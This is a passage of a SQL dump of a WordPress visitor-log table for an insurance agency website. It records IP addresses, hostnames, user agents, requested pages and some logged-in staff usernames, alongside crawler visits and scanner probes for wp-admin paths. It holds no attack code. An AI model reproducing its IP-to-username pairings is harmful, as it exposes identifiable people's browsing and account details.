Spider','','','','0','0',0),(19310,'0b_66c48b7e1e394d0565b9699fc127b2f8','1461141691','207.46.13.185','msnbot-207-46-13-185.search.msn.com','/members/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19311,'0b_9a318849a22cf01427fef1039111179c','1461141713','81.169.144.135','fo-p00-ob.rzone.de','/wp/wp-admin/','','','',0,'','','de','','','Unknown Spider','','','','0','0',0),(19313,'0b_301ec7571c7585e73017ee16f9f1dd8e','1461142178','76.23.48.189','c-76-23-48-189.hsd1.ut.comcast.net','/old/wp-admin/','','','',0,'','','us','','','Unknown Spider','','','','0','0',0),(19316,'0b_9f702e923aa0287f1a802552dd6b8943','1461142416','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(19317,'0b_7901d0e75a44ac0ec105040e630f8fc5','1461146043','37.247.108.25','host-37-247-108-25.routergate.com','/test/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(19320,'0b_6ad6e2a418d6cf53fb7bed854e8f6597','1461146528','184.168.200.228','p3plcpnl0168.prod.phx3.secureserver.net','/wordpress/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(19323,'0b_dd1bd2a2a885747b402253be40edeb71','1461147022','50.62.176.36','p3plcpnl0509.prod.phx3.secureserver.net','/blog/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(19325,'0b_3acc832dfc2d1bda9de7aea2c41862db','1461147161','192.3.145.103','host.colocrossing.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(19328,'0b_bf1c300e848e3b8e832fdcf048bbde5a','1461147521','183.111.174.4','183.111.174.4','/wp/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(19329,'0b_e50ba3980f6097879d1d8d740ffdbd65','1461148012','216.172.189.66','impala.arvixe.com','/old/wp-admin/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(19332,'0b_ec6cf0748136d4c555288bb86470d68d','1461152182','155.133.82.109','155.133.82.109','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36','EMPIREINS.COM','',0,'WinXP','Chrome 34','','','','','','','','2','0',0),(19334,'0b_1d4a0908dbf27678e7d14cbb92d5a6f1','1461152380','157.55.39.7','msnbot-157-55-39-7.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19335,'0b_1d4a0908dbf27678e7d14cbb92d5a6f1','1461152450','157.55.39.7','msnbot-157-55-39-7.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19337,'0b_11de8a4e18d50674374fe951fd63bb69','1461154121','141.8.143.235','spider-141-8-143-235.yandex.com','/members/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(19340,'0b_006e6e4dd542fca385e8cbe9635be15d','1461158151','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(19341,'0b_006e6e4dd542fca385e8cbe9635be15d','1461158153','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(19343,'0b_6a8ebabaff638f9c186f227f0461f16c','1461158390','157.55.39.43','msnbot-157-55-39-43.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(19346,'0b_aab13589bb7bd1222ee63522353cb8ad','1461158462','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(19349,'0b_aab13589bb7bd1222ee63522353cb8ad','1461158463','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(19350,'0b_b4689038261f8d8980ed86937a425ac1','1461158749','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(19353,'0b_b4689038261f8d8980ed86937a425ac1','1461158851','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19355,'0b_b4689038261f8d8980ed86937a425ac1','1461158855','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19358,'0b_b4689038261f8d8980ed86937a425ac1','1461158924','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19359,'0b_b4689038261f8d8980ed86937a425ac1','1461158928','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(19362,'0b_59bd8a49885f2631699639c8658c622f','1461160770','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(19364,'0b_f8031f4bd4fdf5867b8f6190d5a13e5a','1461160792','51.254.121.187','187.ip-51-254-121.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(19365,'0b_f8031f4bd4fdf5867b8f6190d5a13e5a','1461160795','51.254.121.187','187.ip-51-254-121.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(19368,'0b_deb2f3d5f6989867c4564590480eeaac','1461161906','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19370,'0b_f0b5ae1aa1264b752af61bbc3ab97524','1461162462','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(19373,'0b_451d27b98b05d9d71d298b285fa65c45','1461162890','108.170.125.42','ool-6caa7d2a.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','','',0,'Win7 x64','Firefox 45','us','','','','','','','0','0',0),(19376,'0b_451d27b98b05d9d71d298b285fa65c45','1461162892','108.170.125.42','ool-6caa7d2a.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','http://www.empireins.com/','',0,'Win7 x64','Firefox 45','us','','','','','','','0','0',0),(19379,'0b_6568535aa9e76e6180f4a66ff1f2644d','1461163357','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(19382,'0b_22f295940a2600fb7dc81a8f8c24cba9','1461163363','141.8.143.235','spider-141-8-143-235.yandex.com','/agent-tools/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(19385,'0b_252f9f0c71be336cee3513dbae10e4f3','1461163618','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(19388,'0b_252f9f0c71be336cee3513dbae10e4f3','1461163619','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(19391,'0b_252f9f0c71be336cee3513dbae10e4f3','1461163625','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(19394,'0b_51654240c092c7f7c6da445db04466c1','1461163655','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19395,'0b_51654240c092c7f7c6da445db04466c1','1461163714','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19397,'0b_51654240c092c7f7c6da445db04466c1','1461163715','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19398,'0b_51654240c092c7f7c6da445db04466c1','1461163720','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19401,'0b_31a4168f96fedb746091b92d910fd17b','1461163723','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','admin','','0','0',0),(19404,'0b_31a4168f96fedb746091b92d910fd17b','1461163726','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','admin','','0','0',0),(19407,'0b_31a4168f96fedb746091b92d910fd17b','1461163738','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','admin','','0','51',0),(19410,'0b_31a4168f96fedb746091b92d910fd17b','1461163739','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','admin','','0','0',0),(19413,'0b_31a4168f96fedb746091b92d910fd17b','1461163742','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','admin','','0','51',0),(19415,'0b_252f9f0c71be336cee3513dbae10e4f3','1461163747','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(19418,'0b_252f9f0c71be336cee3513dbae10e4f3','1461163749','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(19419,'0b_252f9f0c71be336cee3513dbae10e4f3','1461163749','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(19422,'0b_252f9f0c71be336cee3513dbae10e4f3','1461163753','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(19424,'0b_31a4168f96fedb746091b92d910fd17b','1461163769','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','admin','','0','51',0),(19425,'0b_51654240c092c7f7c6da445db04466c1','1461164002','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19427,'0b_51654240c092c7f7c6da445db04466c1','1461164041','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19430,'0b_51654240c092c7f7c6da445db04466c1','1461164047','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19431,'0b_88baa6f349e3e376ced5922dc6ed01c9','1461164139','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','','','','','cheskelb','','0','0',0),(19434,'0b_37f0f0e6fc41af78d75f77b0c79cd1e1','1461165059','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(19437,'0b_37f0f0e6fc41af78d75f77b0c79cd1e1','1461165061','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(19439,'0b_37f0f0e6fc41af78d75f77b0c79cd1e1','1461165065','184.154.139.23','placeholder.sitelock.com','/home/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(19440,'0b_37f0f0e6fc41af78d75f77b0c79cd1e1','1461165071','184.154.139.23','placeholder.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(19442,'0b_37f0f0e6fc41af78d75f77b0c79cd1e1','1461165073','184.154.139.23','placeholder.sitelock.com','/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(19443,'0b_37f0f0e6fc41af78d75f77b0c79cd1e1','1461165075','184.154.139.23','placeholder.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(19445,'0b_178422bf5b3c6031def5447a520a8e1d','1461165077','184.154.139.23','placeholder.sitelock.com','/?p=277','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','0','0',0),(19446,'0b_37f0f0e6fc41af78d75f77b0c79cd1e1','1461165078','184.154.139.23','placeholder.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(19449,'0b_88baa6f349e3e376ced5922dc6ed01c9','1461165753','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','cheskelb','','0','0',0),(19452,'0b_88baa6f349e3e376ced5922dc6ed01c9','1461166353','108.58.88.178','ool-6c3a58b2.static.optonline.net','/wp-admin/profile.php','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','cheskelb','','0','0',0),(19455,'0b_88baa6f349e3e376ced5922dc6ed01c9','1461166353','108.58.88.178','ool-6c3a58b2.static.optonline.net','/wp-admin/profile.php','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','cheskelb','','0','0',0),(19457,'0b_3451f3142970f7dca4d454b7d2bc9a40','1461166354','100.34.109.11','static-100-34-109-11.phlapa.fios.verizon.net','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','','',0,'Win7 x64','IE 9','us','2425 x 1364','','','','','','0','0',0),(19460,'0b_3451f3142970f7dca4d454b7d2bc9a40','1461166359','100.34.109.11','static-100-34-109-11.phlapa.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.empireins.com/','',0,'Win7 x64','IE 9','us','2425 x 1364','','','','','','0','0',0),(19461,'0b_88baa6f349e3e376ced5922dc6ed01c9','1461166375','108.58.88.178','ool-6c3a58b2.static.optonline.net','/wp-admin/profile.php?updated=1','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/wp-admin/profile.php','',0,'Win7 x64','IE 11','us','1536 x 864','','','','cheskelb','','0','0',0),(19463,'0b_3451f3142970f7dca4d454b7d2bc9a40','1461166387','100.34.109.11','static-100-34-109-11.phlapa.fios.verizon.net','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.empireins.com/','',0,'Win7 x64','IE 9','us','2425 x 1364','','','','','','0','0',0),(19466,'0b_3451f3142970f7dca4d454b7d2bc9a40','1461166421','100.34.109.11','static-100-34-109-11.phlapa.fios.verizon.net','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 9','us','2425 x 1364','','','','cheskelb','','0','51',0),(19469,'0b_51654240c092c7f7c6da445db04466c1','1461166421','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','admin','','0','51',0),(19470,'0b_51654240c092c7f7c6da445db04466c1','1461166422','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','admin','','0','0',0),(19472,'0b_51654240c092c7f7c6da445db04466c1','1461166427','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','admin','','0','51',0),(19473,'0b_88baa6f349e3e376ced5922dc6ed01c9','1461166434','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/wp-admin/profile.php?updated=1','',0,'Win7 x64','IE 11','us','1536 x 864','','','','cheskelb','','0','51',0),(19475,'0b_88baa6f349e3e376ced5922dc6ed01c9','1461166434','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','cheskelb','','0','0',0),(19478,'0b_88baa6f349e3e376ced5922dc6ed01c9','1461166441','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','cheskelb','','0','51',0),(19481,'0b_7c6fe6560b7c105e06da5d05fe518a31','1461166496','50.248.3.9','50-248-3-9-static.hfc.comcastbusiness.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1920 x 1080','Google','','','','','0','0',0),(19484,'0b_7c6fe6560b7c105e06da5d05fe518a31','1461166508','50.248.3.9','50-248-3-9-static.hfc.comcastbusiness.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19487,'0b_3451f3142970f7dca4d454b7d2bc9a40','1461166592','100.34.109.11','static-100-34-109-11.phlapa.fios.verizon.net','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.empireins.com/forms/','',0,'Win7 x64','IE 9','us','2425 x 1364','','','','cheskelb','','0','51',0),(19490,'0b_3451f3142970f7dca4d454b7d2bc9a40','1461166593','100.34.109.11','static-100-34-109-11.phlapa.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.empireins.com/','',0,'Win7 x64','IE 9','us','2425 x 1364','','','','cheskelb','','0','0',0),(19491,'0b_3451f3142970f7dca4d454b7d2bc9a40','1461166596','100.34.109.11','static-100-34-109-11.phlapa.fios.verizon.net','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.empireins.com/','',0,'Win7 x64','IE 9','us','2425 x 1364','','','','cheskelb','','0','51',0),(19493,'0b_3451f3142970f7dca4d454b7d2bc9a40','1461166605','100.34.109.11','static-100-34-109-11.phlapa.fios.verizon.net','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 9','us','2425 x 1364','','','','cheskelb','','0','51',0),(19496,'0b_3c54381c59cb79f3fe699d103a34d7fc','1461166647','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19497,'0b_3c54381c59cb79f3fe699d103a34d7fc','1461166648','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19499,'0b_3c54381c59cb79f3fe699d103a34d7fc','1461166651','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(19502,'0b_3c54381c59cb79f3fe699d103a34d7fc','1461166663','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','Chaya','','0','51',0),(19505,'0b_1252cf70b9c467ea3f5344eea8514329','1461166742','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19508,'0b_1252cf70b9c467ea3f5344eea8514329','1461166743','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19511,'0b_1252cf70b9c467ea3f5344eea8514329','1461167696','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19514,'0b_1252cf70b9c467ea3f5344eea8514329','1461167699','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(19517,'0b_0cd784c01655701f13cc41f9eba8dbbf','1461167850','50.48.4.251','50-48-4-251.dsl1.monr.ny.frontiernet.net','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 